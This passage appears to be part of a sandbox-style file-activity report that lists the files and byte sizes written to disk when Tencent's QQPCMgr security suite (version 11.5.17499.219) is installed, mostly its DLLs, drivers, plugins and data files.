    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMTrojanScan\QMinfo.xml (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFeedBack.rdb (59 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTask.dat (600 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (468 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDeskTopGC.exe (5831 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmspeedupplugin\speeduprocket\SpeedupRocket.rdb (7972 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\qqpcuninstalljump.png (256 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SXComBase.dll (2097 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1096.dat (449 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\NodisturbOVList.etf (411 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdFilter.dat (696 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmspeedupplugin\speeduprocket\SpeedupRocket.tpc (721 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\IEStartPage.rdb (118 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHIPSLogPolicy.dll (1306 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QMNetMonDll.dll (62 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_898.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTencentNews.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\NetMon.png (424 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\FilterService.ini (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\hptrojanscan\HPTrojanScanInfo.xml (62 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\8.0.50727.4053.policy (808 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.rdb (79 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\syshomepage.tpc (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameSpeedup.exe (8779 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SMobileAssisCfg.etf (323 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\jgImage.dll (716 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_131.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\jgIOStub.dll (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QQPCClinic_QO.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1026.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant\QMLOLAssistant\QMLOLAssistantShell.rdb (1624 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHIPSService.dll (4987 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1106.dat (453 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsmcp.DAT (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QOLogo\QQMobileMgr.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\WebShieldCFG.dat (9 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\NodisturbSGList.etf (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMExt.dll (1769 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1016.dat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1301.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Image\xpword.png (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1012.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GarbageClearV2.dat (155 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\HPInternalScan\HPInternalScan.dll (2208 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSccTrayPlugin\QMSccTrayPlugin.dll (4997 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1500.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1406.dat (969 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMWebFWCfg.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_133.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_352.png (2 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\jsfeature.xml (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\SysHomePage.dll (23169 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\Startup.etf (1826 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tscpm.sys (1193 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftPolicy.etf (296 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\zlib.dll (567 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1412.dat (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdBlock.exe (6273 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUsbGuard.dat (696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\UpdateTrayIcon.exe (2228 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMonPlugin.dll (1642 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSFSEngine.DAT (104 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\SysHomePage.rdb (7972 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\DownloaderMgrUI\DownloaderMgrUI.tpc (763 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\FIFAConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernelEx.sys (2496 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTrojanPlugin\QMTrojanPlugin.dll (10652 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_479.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibexcept.xml (16 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\libexpatw.dll (1184 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSuperScan.EXE (1810 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\GameUpgradeTrayPlugin\GameUpgradeTrayPlugin.dll (3518 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\NetworkFixInfo.xml (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1405.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\Common.dll (20906 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOBusinessCfgV2.etf (617 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\smanalyplugin\SMAnalyPlugin.dll (9480 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileUnlock.dll (33 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1015.dat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\logodef.ico (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\GFCustom.dll (10350 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_109.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMEmKit.dll (1889 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.dll (7706 bytes)
    %Documents and Settings%\%current user%\Application Data\Tencent\DeskUpdate\GlobalMgr.db (190 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\dlcore.dll (17399 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\DownloaderMgrUI\DownloaderMgrUI.dll (6276 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSwitchesMgrPlugin\QMSwitchesMgrPlugin.dll (776 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDlder.dll (3807 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\bugreport_xf.exe (3814 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\FastUninstScpt.etf (95 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\libjpegturbo.dll (2625 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssocScan.dll (3412 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileMon\x64\TFsFltX64.sys (953 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\xGraphic32.dll (1610 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdBlock.dat (696 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdBlock.rdb (1704 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1104.dat (454 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMContextUninstall.dll (715 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssocScanLib.dat (782 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftGroup.etf (90 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\xImage.dll (2088 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ScUrConfig.dat (17 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\DlForQd.dll (3350 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QQPCNetFlow.rdb (6308 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1605.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\More.png (448 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCXPNOTIFY.rdb (1719 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibcss.xml (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\RemoteAssistance.png (720 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysOptimize\QMTraceClear.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_663.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsskx64.sys (54 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSccTrayPlugin\QMSccTrayPlugin.tpc (686 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1028.dat (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\tpk.ini (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10483.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\libexpatw.dll (1195 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\hpswscanplugin\HPSWScanPlugin.dll (3480 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\RtpPage\RtpPage.dll (2928 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsFltMgr.sys (1770 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_2000.dat (597 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\HPScanUIPlugin\HPScanUIPlugin.tpc (711 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSVulPage.dll (11307 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsNetMonWfp64.sys (559 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMMobileSettingCenter\QMMobileSettingCenter.tpc (711 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\msvcp80.dll (6658 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMVulPlugin\QMVulPlugin.dll (3722 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\AVEngine.ini (31 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\zlib.dll (145 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.rdb (50 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\NewPlugin.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\libpng.dll (1843 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\DownloaderInfo.dll (7875 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.dll (10358 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCEntrancePlugin\QMSCEntrancePlugin.rdb (28 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ProcessManager.dll (3261 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSpecTips\QMSpecTips.dll (3119 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMMobileTrayPlugin\QMConnectTipsConfig.dat (520 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1227.dat (1 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\Circle71.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOClient.dll (2383 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMAdBlock.png (653 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\CommonDef.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\MyPhone.ico (292 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCSoftMgr.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.dll (8515 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCGeneralPlugin\QMSCGeneralPlugin.tpc (723 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCClinic.exe (9760 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_565.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\libexpatw.dll (1879 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCBTU.exe (577 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1003.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_127.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\UninstNetWork.dll (46 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\TencentNews.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMEmDrv.sys (49 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMProcessRunningTime.dll (1176 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRTP.exe (3557 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\videocardmark.etf (17 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysspeeduprtpplugin\SysSpeedupRtpPlugin.dll (46 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMRouterPlugin.png (722 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1093.dat (454 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\pluginctrl.xml (31 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QQPCB2AndroidJmp_QO.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\tencentdl.exe (7433 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\NodisturbOGList.etf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr05.def (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMBJTrayPlugin\QMBJTrayPlugin.tpc (818 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\MobileSoftMgr.dll (126 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\xImage.dll (2243 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsNetMon.sys (47 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.dll (6138 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_116.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10001.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSafeBoxHelperDll.dll (1222 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibblackac.xml (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMBluescreenFixer\bugreport.exe (5919 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\QMRealTimeSpeedupSkinCenter\QMRealTimeSpeedupSkinCenter.zip (601 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMDnsPlugin.png (409 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQRepair.exe (1097 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QQPCLeakScan_QO.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1101.dat (446 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.cat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\qmsxtboxplugin.png (822 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.tpc (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\arkGraphic.dll (3995 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\FtSysCommonMgrGF.rdb (68 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCFileOpen.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\jgImage.dll (164 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1010.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\zlib.dll (1174 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCVulPlugin\QMSCVulPlugin.tpc (707 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\SpeedupMsg.dll (3960 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCfix.dll (8576 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSXTrayPlugin\QMSXTrayPlugin.dll (3615 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1230.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\RefuseInjectShell.DAT (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_890.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMPerfCtrl\QMPerf.dll (2701 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\Common.dll (15539 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftGame.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTipsConfig.dat (9 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssocScanLib2.dat (53 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr02.def (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\RtpPage\RtpPage.png (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\Microsoft.VC80.ATL.cat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\zlib.dll (1033 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1408.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_123.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\CubeConfig.ini (108 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMMain.dll (17622 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\polyphone.dat (12 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRtpController.dll (1506 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\libjpegturbo.dll (3301 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHelper.sys (34 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_862.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMHwFloatWnd\QMHwFloatWnd.rdb (130 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.tpc (715 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOServicePlugin.etf (545 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileOpen.etf (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMClinicsettingcenter\QMClinicSettingCenter.dll (4116 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\arkGraphic.dll (3659 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgrWList.etf (633 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\GlobalConfig.etf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\jgImage.dll (440 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCLaunch.exe (30 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmrtpplugin\QMRtpPlugin.rdb (249 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\QMInsys.sys (1940 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSysRepLibRisk.dat (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1108.dat (455 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysCleanPage\SysCleanPage.dll (6848 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMWlanMacDll.dll (4140 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTencentNews.rdb (212 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\GameSpeedupTipsMgr.dll (5348 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCFIXATDLL.DLL (9258 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCWSCController.exe (1795 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1027.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMStartupMonitorNotify\QMStartupMonitorNotify.dll (3417 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1818.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOBase.dll (2212 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\zlib.dll (1718 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\libpng.dll (928 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SpeedupNetflowLimit.etf (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.rdb (99 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\tpkproxy.dll (2663 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1300.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\GF.dll (17695 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernelEx64.sys (718 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMContextScan64.dll (766 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10485.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QQPCMgrUpdate.dat (656 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\sm01.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1629.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_129.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\qqpcmgr.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\jgImage.dll (131 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFileMonCyber.dat (718 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMClinicsettingcenter\QMClinicSettingCenter.tpc (747 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysCleanPage\SysCleanPage.rdb (137 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMGameAssistantPlugin\QMGameAssistantPlugin.tpc (845 bytes)
    %Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\bugreport.exe (5441 bytes)
